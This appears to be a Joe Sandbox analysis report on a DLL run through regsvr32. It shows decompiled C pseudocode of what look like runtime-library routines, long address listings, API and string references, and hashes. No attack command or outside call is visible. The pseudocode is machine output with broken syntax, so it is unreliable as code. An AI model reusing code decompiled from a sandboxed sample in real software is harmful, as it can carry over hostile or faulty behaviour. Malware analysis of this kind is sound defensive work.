                                                                      				if (r15d == 0) goto 0x8004cd12;
                                                                      				r8d = r14d;
                                                                      				r9d = r14d;
                                                                      				r9d = r9d + 1;
                                                                      				 *(_t1049 + 0x74 + _t1032 * 4) = r8d;
                                                                      				if (r9d != r15d) goto 0x8004cca8;
                                                                      				if (r8d == 0) goto 0x8004cd12;
                                                                      				if ( *(_t1049 + 0x70) - 0x73 >= 0) goto 0x8004cced;
                                                                      				 *(_t1049 + 0x40000000000070) = r8d;
                                                                      				 *(_t1049 + 0x70) =  *(_t1049 + 0x70) + 1;
                                                                      				goto 0x8004cd12;
                                                                      				r15d =  *(_t1049 + 0x70);
                                                                      				goto 0x8004cc91;
                                                                      				r9d = 0;
                                                                      				 *(_t1046 + 0x310) = r14d;
                                                                      				 *(_t1049 + 0x70) = r14d;
                                                                      				E00000001180049864(0x1cc, 0xffffffff, _t1043, _t1049 + 0x74, _t1032, _t1043, _t1046 + 0x314, _t1095, _t1115);
                                                                      				_t1033 = _t1046 + 0x140;
                                                                      				_t609 = E0000000118004B940( *(_t1049 + 0x74 + _t1032 * 4), 0xffffffff, _t1049 + 0x70, _t1033, _t1095, _t950, 0x180000000, _t1113, _t1107);
                                                                      				r13b = 0x30;
                                                                      				if (_t609 != 0xa) goto 0x8004cdbf;
                                                                      				 *_t1043 = 0x31;
                                                                      				if (r12d == 0) goto 0x8004cdd0;
                                                                      				r8d = r14d;
                                                                      				r9d = r14d;
                                                                      				r9d = r9d + 1;
                                                                      				 *(_t1046 + 0x144 + _t1033 * 4) = r8d;
                                                                      				if (r9d != r12d) goto 0x8004cd47;
                                                                      				if (r8d == 0) goto 0x8004cdd0;
                                                                      				if ( *(_t1046 + 0x140) - 0x73 >= 0) goto 0x8004cd94;
                                                                      				 *(_t1046 + 0x40000000000140) = r8d;
                                                                      				 *(_t1046 + 0x140) =  *(_t1046 + 0x140) + 1;
                                                                      				goto 0x8004cdd0;
                                                                      				r9d = 0;
                                                                      				 *(_t1046 + 0x310) = r14d;
                                                                      				 *(_t1046 + 0x140) = r14d;
                                                                      				_t613 = E00000001180049864(0x1cc, 0xffffffff, _t1043 + 1, _t1046 + 0x144, _t1033, _t1043, _t1046 + 0x314, _t1095, _t1105);
                                                                      				goto 0x8004cdd0;
                                                                      				if (_t613 != 0) goto 0x8004cdc7;
                                                                      				_t761 =  *(_t1049 + 0x20) + 1 - 1;
                                                                      				goto 0x8004cdd0;
                                                                      				_t954 = _t1043 + 1;
                                                                      				 *_t1043 = 1;
                                                                      				_t686 =  *((intOrPtr*)(_t1049 + 0x40));
                                                                      				 *((intOrPtr*)( *((intOrPtr*)(_t1049 + 0x58)))) = _t761;
                                                                      				if (_t761 < 0) goto 0x8004cdf0;
                                                                      				if (_t686 - 0x7fffffff > 0) goto 0x8004cdf0;
                                                                      				if ( *(_t1049 + 0x44) != r14d) goto 0x8004cdf0;
                                                                      				_t687 = _t686 + _t761;
                                                                      				_t935 =  *((intOrPtr*)(_t1049 + 0x60)) - 1;
                                                                      				_t1036 =  <  ? _t935 : _t1035;
                                                                      				_t1037 = ( <  ? _t935 : _t1035) + _t1043;
                                                                      				sil = r14b;
                                                                      				if (_t954 == _t1037) goto 0x8004cf09;
                                                                      				r15d = 9;
                                                                      				r9d =  *(_t1049 + 0x70);
                                                                      				if (r9d == 0) goto 0x8004cf0e;
                                                                      				r8d = r14d;
                                                                      				r10d = r14d;
                                                                      				r10d = r10d + 1;
                                                                      				 *(_t1049 + 0x74 + _t1033 * 4) = _t687;
                                                                      				if (r10d != r9d) goto 0x8004ce2a;
                                                                      				if (r8d == 0) goto 0x8004ce91;
                                                                      				if ( *(_t1049 + 0x70) - 0x73 >= 0) goto 0x8004ce6c;
                                                                      				 *(_t1049 + 0x74 + _t935 * 4) = r8d;
                                                                      				 *(_t1049 + 0x70) =  *(_t1049 + 0x70) + 1;
                                                                      				goto 0x8004ce91;
                                                                      				r9d = 0;
                                                                      				 *(_t1046 + 0x310) = r14d;
                                                                      				 *(_t1049 + 0x70) = r14d;
                                                                      				E00000001180049864(0x1cc, _t935, _t954, _t1049 + 0x74, _t1033, _t1043, _t1046 + 0x314, _t1095, _t1035);
                                                                      				_t1034 = _t1046 + 0x140;
                                                                      				_t1003 = _t1049 + 0x70;
                                                                      				E0000000118004B940(_t687, _t935, _t1003, _t1034, _t1095, _t950, 0x180000000, _t1039, _t1045);
                                                                      				r10d = _t687;
                                                                      				r10d = r10d -  ~r9d;
                                                                      				r9d = 8;
                                                                      				r8b = r8b - _t1003 + _t1034 + _t1003 + _t1034;
                                                                      				_t690 = _t935 + 0x180000000;
                                                                      				r8d = 0xcccccccd * r8d >> 0x20 >> 3;
                                                                      				if (r10d - r9d > 0) goto 0x8004cedf;
                                                                      				if (_t690 == r13b) goto 0x8004cee5;
                                                                      				sil = 1;
                                                                      				goto 0x8004cee5;
                                                                      				 *((char*)(_t935 + _t954)) = _t690;
                                                                      				_t625 = r9d | 0xffffffff;
                                                                      				r9d = r9d + _t625;
                                                                      				if (r9d != _t625) goto 0x8004ceb1;
                                                                      				_t937 = _t1037 - _t954;
                                                                      				_t938 =  >  ? _t1115 : _t937;
                                                                      				_t955 = _t954 + ( >  ? _t1115 : _t937);
                                                                      				if (_t955 != _t1037) goto 0x8004ce16;
                                                                      				r9d =  *(_t1049 + 0x70);
                                                                      				 *_t955 = r14b;
                                                                      				if (r9d != 0) goto 0x8004cf21;
                                                                      				if (sil != 0) goto 0x8004cf21;
                                                                      				goto 0x8004cf23;
                                                                      				return E00000001180002FB0(0, _t690,  *(_t1046 + 0x6b0) ^ _t1049);
                                                                      			}























































































                                                                      0x18004be14
                                                                      0x18004be14
                                                                      0x18004be14
                                                                      0x18004be24
                                                                      0x18004be2c
                                                                      0x18004be33
                                                                      0x18004be3d
                                                                      0x18004be50
                                                                      0x18004be5c
                                                                      0x18004be61
                                                                      0x18004be66
                                                                      0x18004be6a
                                                                      0x18004be70
                                                                      0x18004be78
                                                                      0x18004be81
                                                                      0x18004be9d
                                                                      0x18004bead
                                                                      0x18004beb3
                                                                      0x18004beb6
                                                                      0x18004beb8
                                                                      0x18004bec6
                                                                      0x18004becb
                                                                      0x18004becf
                                                                      0x18004bed3
                                                                      0x18004bed3
                                                                      0x18004bee2
                                                                      0x18004bee9
                                                                      0x18004beec
                                                                      0x18004bef2
                                                                      0x18004bef9
                                                                      0x18004befb
                                                                      0x18004bf00
                                                                      0x18004bf03
                                                                      0x18004bf0d
                                                                      0x18004bf15
                                                                      0x18004bf1f
                                                                      0x18004bf25
                                                                      0x18004bf2d
                                                                      0x18004bf33
                                                                      0x18004bf44
                                                                      0x18004bf4a
                                                                      0x18004bf4d
                                                                      0x18004bf50
                                                                      0x18004bf52
                                                                      0x18004bf59
                                                                      0x18004bf64
                                                                      0x18004bf67
                                                                      0x18004bf6d
                                                                      0x18004bf71
                                                                      0x18004bf80
                                                                      0x18004bf83
                                                                      0x18004bf88
                                                                      0x18004bf8b
                                                                      0x18004bf8e
                                                                      0x18004bf92
                                                                      0x18004bf97
                                                                      0x18004bfa1
                                                                      0x18004bfaa
                                                                      0x18004bfad
                                                                      0x18004bfb1
                                                                      0x18004bfb4
                                                                      0x18004bfbb
                                                                      0x18004bfbd
                                                                      0x18004bfc1
                                                                      0x18004bfc1
                                                                      0x18004bfc8
                                                                      0x18004bfd5
                                                                      0x18004bfd7
                                                                      0x18004bfdc
                                                                      0x18004bfde
                                                                      0x18004bfe3
                                                                      0x18004bfe9
                                                                      0x18004bff5
                                                                      0x18004bffb
                                                                      0x18004c001
                                                                      0x18004c006
                                                                      0x18004c00c
                                                                      0x18004c00e
                                                                      0x18004c012
                                                                      0x18004c01a
                                                                      0x18004c020
                                                                      0x18004c025
                                                                      0x18004c028
                                                                      0x18004c02a
                                                                      0x18004c02f
                                                                      0x18004c031
                                                                      0x18004c034
                                                                      0x18004c039
                                                                      0x18004c03f
                                                                      0x18004c049
                                                                      0x18004c050
                                                                      0x18004c055
                                                                      0x18004c05c
                                                                      0x18004c067
                                                                      0x18004c06a
                                                                      0x18004c070
                                                                      0x18004c074
                                                                      0x18004c07b
                                                                      0x18004c083
                                                                      0x18004c086
                                                                      0x18004c08b
                                                                      0x18004c08e
                                                                      0x18004c091
                                                                      0x18004c095
                                                                      0x18004c09a
                                                                      0x18004c0a4
                                                                      0x18004c0ad
                                                                      0x18004c0b0
                                                                      0x18004c0b4
                                                                      0x18004c0b7
                                                                      0x18004c0be
                                                                      0x18004c0c0
                                                                      0x18004c0c4
                                                                      0x18004c0c4
                                                                      0x18004c0cb
                                                                      0x18004c0d8
                                                                      0x18004c0da
                                                                      0x18004c0df
                                                                      0x18004c0e1
                                                                      0x18004c0e6
                                                                      0x18004c0ec
                                                                      0x18004c0f8
                                                                      0x18004c0fe
                                                                      0x18004c104
                                                                      0x18004c109
                                                                      0x18004c10f
                                                                      0x18004c111
                                                                      0x18004c115
                                                                      0x18004c11d
                                                                      0x18004c123
                                                                      0x18004c12b
                                                                      0x18004c12d
                                                                      0x18004c137
                                                                      0x18004c139
                                                                      0x18004c13c
                                                                      0x18004c141
                                                                      0x18004c147
                                                                      0x18004c14d
                                                                      0x18004c154
                                                                      0x18004c15c
                                                                      0x18004c164
                                                                      0x18004c16e
                                                                      0x18004c174
                                                                      0x18004c17c
                                                                      0x18004c182
                                                                      0x18004c193
                                                                      0x18004c199
                                                                      0x18004c19c
                                                                      0x18004c19f
                                                                      0x18004c1a1
                                                                      0x18004c1a4
                                                                      0x18004c1a9
                                                                      0x18004c1ad
                                                                      0x18004c1b2
                                                                      0x18004c1b5
                                                                      0x18004c1bb
                                                                      0x18004c1c1
                                                                      0x18004c1c5
                                                                      0x18004c1c9
                                                                      0x18004c1d0
                                                                      0x18004c1d2
                                                                      0x18004c1d5
                                                                      0x18004c1da
                                                                      0x18004c1dc
                                                                      0x18004c1dc
                                                                      0x18004c1e3
                                                                      0x18004c1e5
                                                                      0x18004c1e8
                                                                      0x18004c1ee
                                                                      0x18004c1f0
                                                                      0x18004c1f5
                                                                      0x18004c1f7
                                                                      0x18004c1fd
                                                                      0x18004c204
                                                                      0x18004c219
                                                                      0x18004c221
                                                                      0x18004c227
                                                                      0x18004c229
                                                                      0x18004c243
                                                                      0x18004c24b
                                                                      0x18004c24e
                                                                      0x18004c25e
                                                                      0x18004c265
                                                                      0x18004c265
                                                                      0x18004c269
                                                                      0x18004c26c
                                                                      0x18004c270
                                                                      0x18004c277
                                                                      0x18004c281
                                                                      0x18004c293
                                                                      0x18004c296
                                                                      0x18004c2a3
                                                                      0x18004c2a8
                                                                      0x18004c2af
                                                                      0x18004c2b4
                                                                      0x18004c2ba
                                                                      0x18004c2bf
                                                                      0x18004c2c3
                                                                      0x18004c2c8
                                                                      0x18004c2cb
                                                                      0x18004c2d1
                                                                      0x18004c2d7
                                                                      0x18004c2db
                                                                      0x18004c2df
                                                                      0x18004c2e6
                                                                      0x18004c2e8
                                                                      0x18004c2eb
                                                                      0x18004c2f0
                                                                      0x18004c2f2
                                                                      0x18004c2f2
                                                                      0x18004c2f9
                                                                      0x18004c2fb
                                                                      0x18004c2fe
                                                                      0x18004c304
                                                                      0x18004c306
                                                                      0x18004c30b
                                                                      0x18004c30d
                                                                      0x18004c313
                                                                      0x18004c31a
                                                                      0x18004c32b
                                                                      0x18004c333
                                                                      0x18004c339
                                                                      0x18004c33b
                                                                      0x18004c345
                                                                      0x18004c355
                                                                      0x18004c360
                                                                      0x18004c370
                                                                      0x18004c377
                                                                      0x18004c381
                                                                      0x18004c386
                                                                      0x18004c38b
                                                                      0x18004c391
                                                                      0x18004c396
                                                                      0x18004c3a5
                                                                      0x18004c3b7
                                                                      0x18004c3ba
                                                                      0x18004c3c0
                                                                      0x18004c3c6
                                                                      0x18004c3d5
                                                                      0x18004c3da
                                                                      0x18004c3f4
                                                                      0x18004c409
                                                                      0x18004c40f
                                                                      0x18004c439
                                                                      0x18004c43e
                                                                      0x18004c449
                                                                      0x18004c44b
                                                                      0x18004c453
                                                                      0x18004c455
                                                                      0x18004c458
                                                                      0x18004c45f
                                                                      0x18004c467
                                                                      0x18004c470
                                                                      0x18004c476
                                                                      0x18004c479
                                                                      0x18004c482
                                                                      0x18004c4a7
                                                                      0x18004c4a9
                                                                      0x18004c4b2
                                                                      0x18004c4b8
                                                                      0x18004c4c5
                                                                      0x18004c4c8
                                                                      0x18004c4d2
                                                                      0x18004c4e3
                                                                      0x18004c4e5
                                                                      0x18004c4ec
                                                                      0x18004c4f1
                                                                      0x18004c4f8
                                                                      0x18004c4fd
                                                                      0x18004c502
                                                                      0x18004c508
                                                                      0x18004c50d
                                                                      0x18004c516
                                                                      0x18004c51f
                                                                      0x18004c524
                                                                      0x18004c526
                                                                      0x18004c529
                                                                      0x18004c532
                                                                      0x18004c557
                                                                      0x18004c55c
                                                                      0x18004c565
                                                                      0x18004c56d
                                                                      0x18004c575
                                                                      0x18004c57c
                                                                      0x18004c57f
                                                                      0x18004c586
                                                                      0x18004c58b
                                                                      0x18004c592
                                                                      0x18004c595
                                                                      0x18004c597
                                                                      0x18004c5a2
                                                                      0x18004c5ac
                                                                      0x18004c5af
                                                                      0x18004c5b6
                                                                      0x18004c5be
                                                                      0x18004c5cc
                                                                      0x18004c5cf
                                                                      0x18004c5da
                                                                      0x18004c5de
                                                                      0x18004c5e8
                                                                      0x18004c5f4
                                                                      0x18004c5f7
                                                                      0x18004c5fd
                                                                      0x18004c602
                                                                      0x18004c606
                                                                      0x18004c60c
                                                                      0x18004c61a
                                                                      0x18004c61f
                                                                      0x18004c625
                                                                      0x18004c625
                                                                      0x18004c629
                                                                      0x18004c631
                                                                      0x18004c638
                                                                      0x18004c63d
                                                                      0x18004c640
                                                                      0x18004c646
                                                                      0x18004c655
                                                                      0x18004c65d
                                                                      0x18004c65f
                                                                      0x18004c663
                                                                      0x18004c66b
                                                                      0x18004c675
                                                                      0x18004c696
                                                                      0x18004c69d
                                                                      0x18004c6ab
                                                                      0x18004c6ad
                                                                      0x18004c6b2
                                                                      0x18004c6b7
                                                                      0x18004c6bd
                                                                      0x18004c6c9
                                                                      0x18004c6cb
                                                                      0x18004c6cf
                                                                      0x18004c6d7
                                                                      0x18004c6e4
                                                                      0x18004c6e7
                                                                      0x18004c6ed
                                                                      0x18004c6f4
                                                                      0x18004c6ff
                                                                      0x18004c704
                                                                      0x18004c70a
                                                                      0x18004c71a
                                                                      0x18004c720
                                                                      0x18004c726
                                                                      0x18004c729
                                                                      0x18004c72d
                                                                      0x18004c737
                                                                      0x18004c73e
                                                                      0x18004c745
                                                                      0x18004c748
                                                                      0x18004c74a
                                                                      0x18004c751
                                                                      0x18004c756
                                                                      0x18004c75d
                                                                      0x18004c762
                                                                      0x18004c767
                                                                      0x18004c76d
                                                                      0x18004c772
                                                                      0x18004c78d
                                                                      0x18004c791
                                                                      0x18004c7a8
                                                                      0x18004c7b1
                                                                      0x18004c7bb
                                                                      0x18004c7c4
                                                                      0x18004c7cd
                                                                      0x18004c7d3
                                                                      0x18004c7d6
                                                                      0x18004c7d9
                                                                      0x18004c7df
                                                                      0x18004c7f0
                                                                      0x18004c804
                                                                      0x18004c809
                                                                      0x18004c812
                                                                      0x18004c81e
                                                                      0x18004c826
                                                                      0x18004c82d
                                                                      0x18004c830
                                                                      0x18004c837
                                                                      0x18004c83c
                                                                      0x18004c843
                                                                      0x18004c852
                                                                      0x18004c856
                                                                      0x18004c85c
                                                                      0x18004c85f
                                                                      0x18004c865
                                                                      0x18004c86b
                                                                      0x18004c87a
                                                                      0x18004c87f
                                                                      0x18004c899
                                                                      0x18004c8ae
                                                                      0x18004c8b4
                                                                      0x18004c8de
                                                                      0x18004c8e3
                                                                      0x18004c8ee
                                                                      0x18004c8f0
                                                                      0x18004c8f8
                                                                      0x18004c8fa
                                                                      0x18004c8fd
                                                                      0x18004c902
                                                                      0x18004c90a
                                                                      0x18004c913
                                                                      0x18004c919
                                                                      0x18004c91c
                                                                      0x18004c925
                                                                      0x18004c944
                                                                      0x18004c946
                                                                      0x18004c94f
                                                                      0x18004c955
                                                                      0x18004c960
                                                                      0x18004c963
                                                                      0x18004c96b
                                                                      0x18004c97a
                                                                      0x18004c97c
                                                                      0x18004c983
                                                                      0x18004c988
                                                                      0x18004c98f
                                                                      0x18004c994
                                                                      0x18004c999
                                                                      0x18004c99f
                                                                      0x18004c9a4
                                                                      0x18004c9ab
                                                                      0x18004c9b4
                                                                      0x18004c9b9
                                                                      0x18004c9bb
                                                                      0x18004c9be
                                                                      0x18004c9c7
                                                                      0x18004c9e6
                                                                      0x18004c9eb
                                                                      0x18004c9f2
                                                                      0x18004c9f8
                                                                      0x18004c9fd
                                                                      0x18004ca02
                                                                      0x18004ca05
                                                                      0x18004ca0a
                                                                      0x18004ca0f
                                                                      0x18004ca14
                                                                      0x18004ca17
                                                                      0x18004ca19
                                                                      0x18004ca22
                                                                      0x18004ca34
                                                                      0x18004ca39
                                                                      0x18004ca41
                                                                      0x18004ca4d
                                                                      0x18004ca50
                                                                      0x18004ca5b
                                                                      0x18004ca5f
                                                                      0x18004ca69
                                                                      0x18004ca73
                                                                      0x18004ca76
                                                                      0x18004ca7c
                                                                      0x18004ca81
                                                                      0x18004ca85
                                                                      0x18004ca8b
                                                                      0x18004ca99
                                                                      0x18004ca9e
                                                                      0x18004caa4
                                                                      0x18004caa4
                                                                      0x18004caa8
                                                                      0x18004cab0
                                                                      0x18004cab7
                                                                      0x18004cabc
                                                                      0x18004cabf
                                                                      0x18004cac5
                                                                      0x18004cad4
                                                                      0x18004cadc
                                                                      0x18004cade
                                                                      0x18004cae2
                                                                      0x18004caea
                                                                      0x18004caf4
                                                                      0x18004cb15
                                                                      0x18004cb1c
                                                                      0x18004cb2a
                                                                      0x18004cb2c
                                                                      0x18004cb31
                                                                      0x18004cb36
                                                                      0x18004cb3c
                                                                      0x18004cb48
                                                                      0x18004cb4a
                                                                      0x18004cb4e
                                                                      0x18004cb56
                                                                      0x18004cb63
                                                                      0x18004cb66
                                                                      0x18004cb6c
                                                                      0x18004cb73
                                                                      0x18004cb7e
                                                                      0x18004cb83
                                                                      0x18004cb89
                                                                      0x18004cb99
                                                                      0x18004cb9f
                                                                      0x18004cba5
                                                                      0x18004cba8
                                                                      0x18004cbac
                                                                      0x18004cbb4
                                                                      0x18004cbc0
                                                                      0x18004cbc3
                                                                      0x18004cbc5
                                                                      0x18004cbcc
                                                                      0x18004cbd1
                                                                      0x18004cbd8
                                                                      0x18004cbdd
                                                                      0x18004cbe2
                                                                      0x18004cbe8
                                                                      0x18004cbed
                                                                      0x18004cc06
                                                                      0x18004cc0a
                                                                      0x18004cc1f
                                                                      0x18004cc24
                                                                      0x18004cc2e
                                                                      0x18004cc37
                                                                      0x18004cc3c
                                                                      0x18004cc3e
                                                                      0x18004cc41
                                                                      0x18004cc44
                                                                      0x18004cc4a
                                                                      0x18004cc69
                                                                      0x18004cc6e
                                                                      0x18004cc75
                                                                      0x18004cc7f
                                                                      0x18004cc84
                                                                      0x18004cc89
                                                                      0x18004cc8c
                                                                      0x18004cc95
                                                                      0x18004cca0
                                                                      0x18004cca2
                                                                      0x18004cca5
                                                                      0x18004ccab
                                                                      0x18004ccbd
                                                                      0x18004ccc9
                                                                      0x18004ccce
                                                                      0x18004ccd5
                                                                      0x18004ccdb
                                                                      0x18004cce0
                                                                      0x18004cce4
                                                                      0x18004cce6
                                                                      0x18004cceb
                                                                      0x18004cced
                                                                      0x18004ccf0
                                                                      0x18004ccfe
                                                                      0x18004cd0d
                                                                      0x18004cd12
                                                                      0x18004cd1e
                                                                      0x18004cd23
                                                                      0x18004cd29
                                                                      0x18004cd31
                                                                      0x18004cd3b
                                                                      0x18004cd41
                                                                      0x18004cd44
                                                                      0x18004cd4a
                                                                      0x18004cd5f
                                                                      0x18004cd6e
                                                                      0x18004cd73
                                                                      0x18004cd7c
                                                                      0x18004cd84
                                                                      0x18004cd8c
                                                                      0x18004cd92
                                                                      0x18004cd94
                                                                      0x18004cd97
                                                                      0x18004cda5
                                                                      0x18004cdb8
                                                                      0x18004cdbd
                                                                      0x18004cdc1
                                                                      0x18004cdc3
                                                                      0x18004cdc5
                                                                      0x18004cdca
                                                                      0x18004cdce
                                                                      0x18004cdd5
                                                                      0x18004cdd9
                                                                      0x18004cddd
                                                                      0x18004cde5
                                                                      0x18004cdec
                                                                      0x18004cdee
                                                                      0x18004cdf5
                                                                      0x18004cdfd
                                                                      0x18004ce01
                                                                      0x18004ce04
                                                                      0x18004ce0a
                                                                      0x18004ce10
                                                                      0x18004ce16
                                                                      0x18004ce1e
                                                                      0x18004ce24
                                                                      0x18004ce27
                                                                      0x18004ce2d
                                                                      0x18004ce44
                                                                      0x18004ce4f
                                                                      0x18004ce54
                                                                      0x18004ce5b
                                                                      0x18004ce61
                                                                      0x18004ce66
                                                                      0x18004ce6a
                                                                      0x18004ce6c
                                                                      0x18004ce6f
                                                                      0x18004ce7d
                                                                      0x18004ce8c
                                                                      0x18004ce91
                                                                      0x18004ce98
                                                                      0x18004ce9d
                                                                      0x18004cea2
                                                                      0x18004cea8
                                                                      0x18004ceab
                                                                      0x18004cec6
                                                                      0x18004cec9
                                                                      0x18004cecd
                                                                      0x18004ced3
                                                                      0x18004ced8
                                                                      0x18004ceda
                                                                      0x18004cedd
                                                                      0x18004cee2
                                                                      0x18004cee5
                                                                      0x18004cee8
                                                                      0x18004ceee
                                                                      0x18004cef3
                                                                      0x18004cef9
                                                                      0x18004cefd
                                                                      0x18004cf03
                                                                      0x18004cf09
                                                                      0x18004cf0e
                                                                      0x18004cf14
                                                                      0x18004cf19
                                                                      0x18004cf1f
                                                                      0x18004cf4c

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfomemcpy_s
                                                                      • String ID: MZx$s
                                                                      • API String ID: 1759834784-2700573931
                                                                      • Opcode ID: 7bb4cde24ec730dbd8ae6abdeec503e4c91ce58df76181bdb04959956ad9e9dc
                                                                      • Instruction ID: 8dd5b2d35450ba3af3d02a26da24a20e6ed6c7794efce5b37a1a060195219410
                                                                      • Opcode Fuzzy Hash: 7bb4cde24ec730dbd8ae6abdeec503e4c91ce58df76181bdb04959956ad9e9dc
                                                                      • Instruction Fuzzy Hash: 23A2CFB26045C88BD7F68E29D580BED7691F38C7CCF159215EB0667B94DB38CB488B05
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 0000000180042B34
                                                                        • Part of subcall function 000000018003A7E4: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,000000018003AAEE,?,?,?,?,?,000000018003AD6A), ref: 000000018003A7ED
                                                                        • Part of subcall function 000000018003A7E4: GetCurrentProcess.KERNEL32(?,?,?,?,000000018003AAEE,?,?,?,?,?,000000018003AD6A), ref: 000000018003A812
                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 0000000180042D94
                                                                      • FindFirstFileExW.KERNEL32 ref: 0000000180042E9E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo$CurrentFeatureFileFindFirstPresentProcessProcessor
                                                                      • String ID: *?$C:\Windows\SYSTEM32\regsvr32.exe
                                                                      • API String ID: 1182102293-147900991
                                                                      • Opcode ID: 50f5ff5c26361a5dd4cab9c658941d845c392f2dfb5b7eec1f689869f5f71f14
                                                                      • Instruction ID: aaf5a7572015d4d2546e52bd5e020e85167b5b2a9d0b7b97bc4f9ddc7d26af4d
                                                                      • Opcode Fuzzy Hash: 50f5ff5c26361a5dd4cab9c658941d845c392f2dfb5b7eec1f689869f5f71f14
                                                                      • Instruction Fuzzy Hash: 1602F432714A4841FBA3DB22D9853ED63A1E758BE8F869221FE5907BD5DF38C649C304
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 60%
                                                                      			E0000000118005784C(signed int __ecx, void* __edx, signed int* __rax, void* __rcx, long long __rdx, long long __r8, char _a8, long long _a16, intOrPtr _a32) {
                                                                      				signed int* _v72;
                                                                      				char _v80;
                                                                      				signed int _v88;
                                                                      				signed int* _v96;
                                                                      				void* _v104;
                                                                      				signed int _v120;
                                                                      				void* __rbx;
                                                                      				void* __rdi;
                                                                      				signed char _t127;
                                                                      				signed int _t141;
                                                                      				void* _t151;
                                                                      				void* _t155;
                                                                      				char _t169;
                                                                      				char _t170;
                                                                      				signed int _t174;
                                                                      				void* _t189;
                                                                      				void* _t193;
                                                                      				void* _t194;
                                                                      				void* _t195;
                                                                      				unsigned int _t197;
                                                                      				void* _t200;
                                                                      				long long _t205;
                                                                      				signed int* _t241;
                                                                      				signed long long _t248;
                                                                      				signed short* _t252;
                                                                      				signed int* _t254;
                                                                      				void* _t255;
                                                                      				signed int* _t256;
                                                                      				intOrPtr _t265;
                                                                      				intOrPtr _t266;
                                                                      				signed long long _t272;
                                                                      				long long _t283;
                                                                      				unsigned long long _t284;
                                                                      				signed short* _t286;
                                                                      				signed long long _t289;
                                                                      				signed long long _t290;
                                                                      				signed short* _t294;
                                                                      				signed short* _t296;
                                                                      				unsigned long long _t298;
                                                                      				signed long long _t299;
                                                                      				signed int* _t301;
                                                                      				char* _t302;
                                                                      				char* _t303;
                                                                      
                                                                      				_t283 = __r8;
                                                                      				_t257 = __rcx;
                                                                      				_a16 = __rdx;
                                                                      				r13d = r8d;
                                                                      				if (r12d != 0xfffffffe) goto 0x80057887;
                                                                      				E0000000118003C094(r12d - 0xfffffffe, __rax);
                                                                      				 *__rax =  *__rax & 0x00000000;
                                                                      				E0000000118003BFFC(r12d - 0xfffffffe, __rax);
                                                                      				 *__rax = 9;
                                                                      				goto 0x80057c83;
                                                                      				if (__ecx < 0) goto 0x80057c6b;
                                                                      				_t200 = r12d -  *0x80074110; // 0x40
                                                                      				if (_t200 >= 0) goto 0x80057c6b;
                                                                      				r8d = 1;
                                                                      				_v80 = __r8;
                                                                      				_t289 = __ecx >> 6;
                                                                      				_v88 = _t289;
                                                                      				_t299 = __ecx + __ecx * 8;
                                                                      				_t265 =  *((intOrPtr*)(0x80073d10 + _t289 * 8));
                                                                      				if ((r8b &  *(_t265 + 0x38 + _t299 * 8)) == 0) goto 0x80057c6b;
                                                                      				if (r13d - 0x7fffffff <= 0) goto 0x800578f7;
                                                                      				E0000000118003C094(r13d - 0x7fffffff, __ecx);
                                                                      				 *__ecx =  *__ecx & 0x00000000;
                                                                      				_t127 = E0000000118003BFFC(r13d - 0x7fffffff, __ecx);
                                                                      				 *__ecx = 0x16;
                                                                      				goto 0x80057c7e;
                                                                      				if (r13d == 0) goto 0x80057c67;
                                                                      				if ((_t127 & 0x00000002) != 0) goto 0x80057c67;
                                                                      				_t205 = __rdx;
                                                                      				if (_t205 == 0) goto 0x800578df;
                                                                      				r11d =  *((char*)(_t265 + 0x39 + _t299 * 8));
                                                                      				_t241 =  *((intOrPtr*)(_t265 + 0x28 + _t299 * 8));
                                                                      				_v96 = _t241;
                                                                      				_a8 = r11b;
                                                                      				_t23 = _t255 + 4; // 0x4
                                                                      				r15d = _t23;
                                                                      				if (_t205 == 0) goto 0x80057966;
                                                                      				if (r11d - r8d != r8d) goto 0x8005795e;
                                                                      				if ((r8b &  !r13d) != 0) goto 0x8005795e;
                                                                      				E0000000118003C094(r8b &  !r13d, _t241);
                                                                      				 *_t241 =  *_t241 & 0;
                                                                      				E0000000118003BFFC(r8b &  !r13d, _t241);
                                                                      				 *_t241 = 0x16;
                                                                      				E0000000118003A794();
                                                                      				goto 0x80057af5;
                                                                      				goto 0x800579e5;
                                                                      				if ((r8b &  !r13d) == 0) goto 0x80057942;
                                                                      				_t193 =  <  ? r15d : r13d >> 1;
                                                                      				E0000000118003C378(_t241, __rcx, __rdx);
